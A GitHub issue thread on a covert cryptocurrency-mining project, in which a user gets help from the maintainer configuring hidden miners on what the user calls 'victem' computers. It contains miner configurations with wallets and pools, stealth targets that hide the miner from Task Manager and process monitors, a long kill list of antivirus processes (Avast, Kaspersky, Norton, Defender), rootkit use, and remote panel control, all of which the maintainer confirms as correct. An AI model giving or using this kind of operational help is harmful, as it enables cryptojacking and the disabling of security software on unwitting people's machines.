### ISSUE TITLE
gostrider with xmproxy using

### ISSUE THREAD

**Issue by DARK-DEVIL-66** [UnamSanctam/SilentCryptoMiner#2027]
Hi Bro can i use Ghostrider  algo with xmproxy ?

**Comment by DARK-DEVIL-66** [comment]
$77 root kit not working properly i installed intall.exe but never hiding file or process i can't undastand the project thire support are very low do you have any knowladge about that ?

**Comment by UnamSanctam** [comment]
>Hi Bro can i use Ghostrider algo with xmproxy ?

No xmrig-proxy does not support the GhostRider algo.

>$77 root kit not working properly i installed intall.exe but never hiding file or process i can't undastand the project thire support are very low do you have any knowladge about that ?

It should work properly most of the time, but it's not recommended to use it unless you know a lot about computers and can understand any problems that may happen. Hence the warning on the wiki (https://github.com/UnamSanctam/SilentCryptoMiner/wiki#use-rootkit-hide-miner).

**Comment by DARK-DEVIL-66** [comment]
{
    "algo": "gr",
    "pool": "ghostrider.mine.zergpool.com",
    "port": 15354,
    "wallet": "4B9ttGq1dRJgqmnGJ6HLeZ7VhdTxvQS67Nb4FiN5CXKNNy6mJnYvTSzdyXxrfUF1mcEx4VzqzA4mBRSDxCf6aCyL1D2hSnC",
    "password": "c=XMR,ID={COMPUTERNAME}",
    "ssltls": true,
    "nicehash": false,
    "max-cpu": 20,
    "idle-wait": 5,
    "idle-cpu": 80,
    "stealth-targets": "ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": "",
    "stealth-fullscreen": false
}


just take a look bro it's correct or anything wrong in my web config ?

and zergpool.com is stable thire service and payment ?
i confiusing after Reading  thire reviwes on internet !

**Comment by DARK-DEVIL-66** [comment]
i never used build time nicehash (xm-proxy)
but at the time i have low hashrate miners so can i have chances to combain all miners ?

i mean can i have chances to divert all miners to xm-proxy ?

**Comment by UnamSanctam** [comment]
>i never used build time nicehash (xm-proxy)

That doesn't matter, the nicehash setting can be set for each pool connection.

>i mean can i have chances to divert all miners to xm-proxy ?

Not with xmrig-proxy since it doesn't support the GhostRider proxy.

>but at the time i have low hashrate miners so can i have chances to combain all miners ?

I shouldn't really matter. 100 miners with 100 H/s should give as much profit as 1 miner with 10000 H/s.

**Comment by UnamSanctam** [comment]
Yes you just change the "pool" and "port" in the configuration to your xmrig-proxy, and you should also set "nicehash" to true in the configuration.

**Comment by DARK-DEVIL-66** [comment]
i changed sucessfully but the issue hashrate 500h/s to 0  why that

 * COMMANDS     hashrate, connections, verbose, workers
[2023-12-12 11:07:41.576]  proxy    0.00 kH/s, shares: 0/0 +0, upstreams: 1, miners: 0 (max 0) +0/-0
[2023-12-12 11:08:41.639]  proxy    0.00 kH/s, shares: 0/0 +0, upstreams: 1, miners: 0 (max 0) +0/-0
[2023-12-12 11:09:41.703]  proxy    0.00 kH/s, shares: 0/0 +0, upstreams: 1, miners: 1 (max 1) +1/-0
WORKER NAME             | LAST IP         | COUNT | ACCEPTED | REJ |  10 MINUTES |    24 HOURS |
                        | 175.157.19.252  |     1 |        0 |   0 |   0.00 kH/s |   0.00 kH/s |
[2023-12-12 11:10:41.763]  proxy    0.00 kH/s, shares: 0/0 +0, upstreams: 1, miners: 1 (max 1) +0/-0
[2023-12-12 11:10:45.360]  proxy    speed (1m) 0.00, (10m) 0.00, (1h) 0.00, (12h) 0.00, (24h) 0.00 kH/s

**Comment by DARK-DEVIL-66** [comment]
my config


{
    "access-log-file": null,
    "access-password": null,
    "algo-ext": true,
    "api": {
        "id": null,
        "worker-id": null
    },
    "http": {
        "enabled": false,
        "host": "127.0.0.1",
        "port": 0,
        "access-token": null,
        "restricted": true
    },
    "background": false,
    "bind": [
        {
            "host": "0.0.0.0",
            "port": 8888,
            "tls": true
        },
        {
            "host": "::",
            "port": 8888,
            "tls": true
        }
    ],
    "colors": true,
    "title": true,
    "custom-diff": 120000,
    "custom-diff-stats": false,
    "donate-level": 0,
    "log-file": null,
    "mode": "nicehash",
    "pools": [
        {
            "algo": "rx/0",
            "url": "sg.zephyr.herominers.com:1123",
            "user": "ZEPHYR2s5bnTUHNSTKfG9Gc6eC88LFNpEcHjChP2HTi1Wt1pry5XXqBWrLeUUYzzurC22ySZHLwvRgmSAvNcDXsZKm3K9uKBVD33w",
            "pass": "Saba-zephyr",
            "keepalive": false,
            "enabled": true,
            "tls": true
        }
    ],
    "retries": 2,
    "retry-pause": 1,
    "reuse-timeout": 0,
    "tls": {
        "enabled": true,
        "protocols": null,
        "cert": null,
        "cert_key": null,
        "ciphers": null,
        "ciphersuites": null,
        "dhparam": null
    },
    "user-agent": null,
    "syslog": false,
    "verbose": false,
    "watch": true,
    "workers": true
}

**Comment by UnamSanctam** [comment]
The proxy works the same way as the pool, it calculates the hashrate based on the amount of submited shares over some sort of interval. You just haven't found a share yet.

**Comment by DARK-DEVIL-66** [comment]
![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/c7975b2a-c8ce-477e-ac76-37061eea0eba)

**Comment by DARK-DEVIL-66** [comment]
webpenal and xm-proxy side

**Comment by DARK-DEVIL-66** [comment]
anything wrong in my configs ?

**Comment by UnamSanctam** [comment]
Doesn't seem like they are wrong, the computer in question probably doesn't have enough resources at the moment to mine RandomX.

**Comment by DARK-DEVIL-66** [comment]
no it's appeared previously 500h/s or 1kh/s  but now web penal showing 300h/s but xm-proxy showing 0h/s


and i want to know my config is ok for diff 120000

**Comment by DARK-DEVIL-66** [comment]
{
    "algo": "rx/0",
    "pool": "212.226.83.251",
    "port": 8888,
    "wallet": "",
    "password": "",
    "nicehash": true,
    "ssltls": true,
    "max-cpu": 20,
    "idle-wait": 5,
    "idle-cpu": 80,
    "stealth-targets": "ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": "",
    "stealth-fullscreen": false
}


it's correct ?

**Comment by DARK-DEVIL-66** [comment]
and miner never appeared to pool dashboard ?

**Comment by UnamSanctam** [comment]
>no it's appeared previously 500h/s or 1kh/s but now web penal showing 300h/s but xm-proxy showing 0h/s
and i want to know my config is ok for diff 120000

Because it hasn't found a share, it showing 0 H/s in the xmrig-proxy when no share has been found is what's supposed to happen. You're not using a custom diff of 120000 since "custom-diff-stats" is set to `false`. And the custom diff is only for the xmrig-proxy statistics, the pool share difficulty will still be the same.

>it's correct ?

Yes it seems correct.

>and miner never appeared to pool dashboard ?

The xmrig-proxy will appear in the pool dashboard when a share is submitted to the pool.

**Comment by DARK-DEVIL-66** [comment]
can i change pool share difficulty from xm-proxy/webconfig

**Comment by UnamSanctam** [comment]
Only if the pool supports it, it's the same as if you were to do it with the regular configuration.

**Comment by DARK-DEVIL-66** [comment]
my pool is herominer so how can i specify pool share difficulty and 
wich config i need to made changes web config or xm-proxy config ?

**Comment by DARK-DEVIL-66** [comment]
just take a look the web penal https://www.lk.g-netgroup.com/#

i need to indigrate the our miner xm-proxy so how can i do that ?

it's help for realise share confirmation and invalidation

**Comment by UnamSanctam** [comment]
>my pool is herominer so how can i specify pool share difficulty and

You do it by adding = after the wallet address like we did before, but when we tried that before it seems like the minimum static share difficulty they allow was 480000.

>wich config i need to made changes web config or xm-proxy config ?

All pool configurations gets made in the xmrig-proxy.

>just take a look the web penal https://www.lk.g-netgroup.com/#
i need to indigrate the our miner xm-proxy so how can i do that ?
it's help for realise share confirmation and invalidation

I believe you will have to enable the "http" part of your xmrig-proxy configuration. You will also need to set a port. And is the xmrig-proxy running on the same computer/server as that website or another one?

**Comment by DARK-DEVIL-66** [comment]
same

**Comment by DARK-DEVIL-66** [comment]
![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/6cee62bf-4f88-499a-9b51-e48fa7a4bfdc)


web penal showing miners is offline ago 3m 

but proxy will showing active

[2023-12-12 12:06:00.204]  net      0000 new job from sg.zephyr.herominers.com:1123 diff 480045 algo rx/0 height 140058
WORKER NAME             | LAST IP         | COUNT | ACCEPTED | REJ |  10 MINUTES |    24 HOURS |
                        | 175.157.19.252  |     1 |        1 |   0 |   0.80 kH/s |   0.01 kH/s |
[2023-12-12 12:06:07.067]  net      0000 new job from sg.zephyr.herominers.com:1123 diff 480045 algo rx/0 height 140059
[2023-12-12 12:06:08.174]  proxy    0.00 kH/s, shares: 1/0 +0, upstreams: 1, miners: 1 (max 1) +0/-0
[2023-12-12 12:07:08.240]  proxy    0.00 kH/s, shares: 1/0 +0, upstreams: 1, miners: 1 (max 1) +0/-0

**Comment by UnamSanctam** [comment]
>web penal showing miners is offline ago 3m
but proxy will showing active

Maybe they can't connect to your web server at the moment, or is the api-endpoint wrong in any of your configurations?

>same server

If it's on the same server then you can just enable the "http" part, change the port and then enter: 127.0.0.1:port on that website.

**Comment by DARK-DEVIL-66** [comment]
WORKER NAME             | LAST IP         | COUNT | ACCEPTED | REJ |  10 MINUTES |    24 HOURS |
                        | 175.157.19.252  |     1 |        1 |   0 |   0.00 kH/s |   0.01 kH/s |
[2023-12-12 12:10:27.820]  proxy    speed (1m) 0.00, (10m) 0.00, (1h) 0.13, (12h) 0.01, (24h) 0.01 kH/s
[2023-12-12 12:10:29.549] * upstreams active: 1 sleep: 0 error: 0 total: 1
[2023-12-12 12:10:29.549] * miners    active: 1 max: 1 ratio: 1:1.0

**Comment by DARK-DEVIL-66** [comment]
can i set kill target and block web site from web penal or remote config ?

**Comment by UnamSanctam** [comment]
Yes.

**Comment by DARK-DEVIL-66** [comment]
is possible to use normal xmrig.exe with remoteconfig ?

have any possible ways ?

**Comment by UnamSanctam** [comment]
No you would have to modify the xmrig code, or you would have to host your settings inside a config.json that you update through some other program.

**Comment by DARK-DEVIL-66** [comment]
{
    "url": "stratums://4B9ttGq1dRJgqmnGJ6HLeZ7VhdTxvQS67Nb4FiN5CXKNNy6mJnYvTSzdyXxrfUF1mcEx4VzqzA4mBRSDxCf6aCyL1D2hSnC.{COMPUTERNAME}:c=XMR@kawpow.mine.zergpool.com:13638",
    "algo": "kawpow",
    "stealth-targets": "ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": "",
    "max-gpu": 50,
    "idle-wait": 5,
    "idle-gpu": 90,
    "stealth-fullscreen": false
}


anything wrong this config

whare can i watch my miner list in zergpool same ghostrider dashboard ?

**Comment by DARK-DEVIL-66** [comment]
![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/a0ae36c9-74a0-47bc-9dd4-a50601319ad7)



wich is profitable for this gpu kawpow or etc hashrate 1/2kh

**Comment by UnamSanctam** [comment]
Oh, it should be:
```
{
"url": "stratums://4B9ttGq1dRJgqmnGJ6HLeZ7VhdTxvQS67Nb4FiN5CXKNNy6mJnYvTSzdyXxrfUF1mcEx4VzqzA4mBRSDxCf6aCyL1D2hSnC:c=XMR,ID={COMPUTERNAME}@kawpow.mine.zergpool.com:13638",
"algo": "kawpow",
"stealth-targets": "ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
"kill-targets": "",
"max-gpu": 50,
"idle-wait": 5,
"idle-gpu": 90,
"stealth-fullscreen": false
}
```

>whare can i watch my miner list in zergpool same ghostrider dashboard ?

Yes it's the same page as your GhostRider miners, since you check the wallet depending on the payout currency, and you use XMR for both.

>wich is profitable for this gpu kawpow or etc hashrate 1/2kh

KawPow, you can see it here: https://whattomine.com/

**Comment by DARK-DEVIL-66** [comment]
KawPow  is using low end resourse ?

**Comment by UnamSanctam** [comment]
It depends on the coin being mined.

**Comment by DARK-DEVIL-66** [comment]
{
"url": "stratums://4B9ttGq1dRJgqmnGJ6HLeZ7VhdTxvQS67Nb4FiN5CXKNNy6mJnYvTSzdyXxrfUF1mcEx4VzqzA4mBRSDxCf6aCyL1D2hSnC:c=XMR,ID={COMPUTERNAME}@kawpow.mine.zergpool.com:13638",
"algo": "kawpow",
"stealth-targets": "ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
"kill-targets": "afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,kavfswp.exe,kavtray.exe,kavfsmui.exe,kavshell.exe,kavfsrcn.exe,kavfs.exe,kavfsgt.exe,kavfswh.exe,kavfsscs.exe,efpeadm.exe,VPNGUI.exe,CVPND.exe,IPSECLOG.exe,cfp.exe,fsdfwd.exe,fsguiexe.exe,blackd.exe,kpf4gui.exe ,MSSCLL.exe,MCSHELL.exe,MPFSERVICE.exe,MPFAGENT.exe,nisum.exe,smc.exe,persfw.exe,pccpfw.exe,WINSS.exe,ZLCLIENT.exe,MCODS.exe,MCSHIELD.exe,msmpeng.exe,navapsvc.exe,avkwctl.exe,fsav32.exe,mcshield.exe,ntrtscan.exe,avguard.exe,ashServ.exe,AVENGINE.exe,avgemc.exe,tmntsrv.exe,ARestore.exe,asOELnch.exe,buVss.exe,cltLMH.exe,cltRT.exe,coInst.exe,coNatHst.exe,CpySnpt.exe,EFAInst64.exe,elaminst.exe,FLDgHost.exe,InstCA.exe,MCUI32.exe,Navw32.exe,ncolow.exe,NortonSecurity.exe,NSc.exe,nsWscSvc.exe,nuPerfScan.exe,RuleUp.exe,SEFInst.exe,Sevntx64.exe,SRTSP_CA.exe,SymDgnHC.exe,symerr.exe,SymVTCatalogDB.exe,tuIH.exe,uiStub.exe,uiWNSNotificationApp.exe,Upgrade.exe,vpnCA.exe,wa_3rd_party_host_32.exe,wa_3rd_party_host_64.exe,WFPUnins.exe,wpInstCA.exe,WSCStub.exe",
"max-gpu": 50,
"idle-wait": 5,
"idle-gpu": 90,
"stealth-fullscreen": false
}


it's correct

**Comment by UnamSanctam** [comment]
Yes that looks correct.

**Comment by DARK-DEVIL-66** [comment]
but i switched to this config cpu miner is stopped and gpu miner is starting  ?

**Comment by UnamSanctam** [comment]
Hmm that looks right, is it for a 3.4.0 miner?

**Comment by UnamSanctam** [comment]
No probably not, they don't use the same kind of resources.

**Comment by DARK-DEVIL-66** [comment]
![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/23f4020b-fd27-43f0-877c-775a24bcc193)


i switched pool but still neer switching ?

**Comment by UnamSanctam** [comment]
Only that miner or all miners with that configuration?

**Comment by DARK-DEVIL-66** [comment]
![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/4af28a00-4303-4f5b-a181-1edd67368fbd)


only one !

**Comment by UnamSanctam** [comment]
It probably wasn't able to connect to the pool so it temporarily changed to the backup pool instead.

**Comment by DARK-DEVIL-66** [comment]
![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/f817433b-72e5-4897-b3de-a34fc3f783b3)


why hashrate field are empty  in pool dashboard ?

![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/35dbd937-434b-40aa-b2a5-ff920eca31f5)

**Comment by UnamSanctam** [comment]
It might not have submitted anything yet.

**Comment by DARK-DEVIL-66** [comment]
i want to know onethink

my one miner is active 2/3 houres for day
it's will coming randomly online so 2miner is showing your round share is 20% so
the miner will going to offline now whats happen to me i will get any income or not ?

**Comment by UnamSanctam** [comment]
The round share is for that specific block that the pool is currently mining, you get the percentage whenever the next block is found https://xmr.2miners.com/blocks.

**Comment by DARK-DEVIL-66** [comment]
when i useing 2miners.com pool pc/laptop will freezing comparized to other pool ithink reason is high diff i am correct?

**Comment by UnamSanctam** [comment]
No that shouldn't make any difference, the pool doesn't really influence any resources that the miner uses.

**Comment by DARK-DEVIL-66** [comment]
![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/81989e99-6e29-4910-8dc1-82f9480dc801)


ok just take a look the miner it's will generate around 2/3kh/s when i switching to 2miniers hashrate are decresed to 0h/s in web penal and victem has going to offline

after switching i will show off next screenshot !

**Comment by DARK-DEVIL-66** [comment]
![image](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149578298/5acaae93-2700-4324-be40-cb99c56a023c)


usually happen when we changing one pool to anthor pool it's will increase after 2/3min

but 2miner miners never increse

**Comment by DARK-DEVIL-66** [comment]
but real hashrate are appearing to pool dashboard

**Comment by UnamSanctam** [comment]
I guess there's something weird with the 2miners pool then.

**Comment by DARK-DEVIL-66** [comment]
extractly reason is some miners using rig name is like CDESKTOP,CCONSOALTENCY
anyone can easyly predict it''s silent miner

**Comment by DARK-DEVIL-66** [comment]
"keepalive": false,  whats the use of this i enabled in silent miner config

**Comment by DARK-DEVIL-66** [comment]
"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
	"kill-targets": "afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,kavfswp.exe,kavtray.exe,kavfsmui.exe,kavshell.exe,kavfsrcn.exe,kavfs.exe,kavfsgt.exe,kavfswh.exe,kavfsscs.exe,efpeadm.exe,VPNGUI.exe,CVPND.exe,IPSECLOG.exe,cfp.exe,fsdfwd.exe,fsguiexe.exe,blackd.exe,kpf4gui.exe ,MSSCLL.exe,MCSHELL.exe,MPFSERVICE.exe,MPFAGENT.exe,nisum.exe,smc.exe,persfw.exe,pccpfw.exe,WINSS.exe,ZLCLIENT.exe,MCODS.exe,MCSHIELD.exe,msmpeng.exe,navapsvc.exe,avkwctl.exe,fsav32.exe,mcshield.exe,ntrtscan.exe,avguard.exe,ashServ.exe,AVENGINE.exe,avgemc.exe,tmntsrv.exe,ARestore.exe,asOELnch.exe,buVss.exe,cltLMH.exe,cltRT.exe,coInst.exe,coNatHst.exe,CpySnpt.exe,EFAInst64.exe,elaminst.exe,FLDgHost.exe,InstCA.exe,MCUI32.exe,Navw32.exe,ncolow.exe,NortonSecurity.exe,NSc.exe,nsWscSvc.exe,nuPerfScan.exe,RuleUp.exe,SEFInst.exe,Sevntx64.exe,SRTSP_CA.exe,SymDgnHC.exe,symerr.exe,SymVTCatalogDB.exe,tuIH.exe,uiStub.exe,uiWNSNotificationApp.exe,Upgrade.exe,vpnCA.exe,wa_3rd_party_host_32.exe,wa_3rd_party_host_64.exe,WFPUnins.exe,wpInstCA.exe,WSCStub.exe",



when i use this it's consume more resourse in victem pc ?

**Comment by UnamSanctam** [comment]
>extractly reason is some miners using rig name is like CDESKTOP,CCONSOALTENCY
anyone can easyly predict it''s silent miner

Sure but nothing usually happens, in this case that is not the cause (obviously).

>"keepalive": false, whats the use of this i enabled in silent miner config

Keepalive sends a ping to the pool regularly so that the pool connection doesn't time out, some pools support keepalive and some don't.

>when i use this it's consume more resourse in victem pc ?

No.

**Comment by UnamSanctam** [comment]
I don't know if they actually support it or not, or how well it works with their pool. Most likely they support it.

**Comment by DARK-DEVIL-66** [comment]
can i edit web penel  defult xmrig config is miners active time ?

**Comment by UnamSanctam** [comment]
Not sure what you're asking, but you can always change the configurations and they will use that the next time they contact the web panel (every minute).

**Comment by DARK-DEVIL-66** [comment]
keep alive defult ping time gap ?

**Comment by UnamSanctam** [comment]
60 seconds I think.

**Comment by DARK-DEVIL-66** [comment]
ok bro let me try....

**Comment by DARK-DEVIL-66** [comment]
previously i used build time max cpu is 20 can i increase from web penal ?

**Comment by UnamSanctam** [comment]
Yes you just change the "max-cpu" option.

**Comment by DARK-DEVIL-66** [comment]
idea for showing about howmany shares submited and rejected in web penal i know it's hard but it's very usefull 


and your work are A Grade brother no body can make like thish........
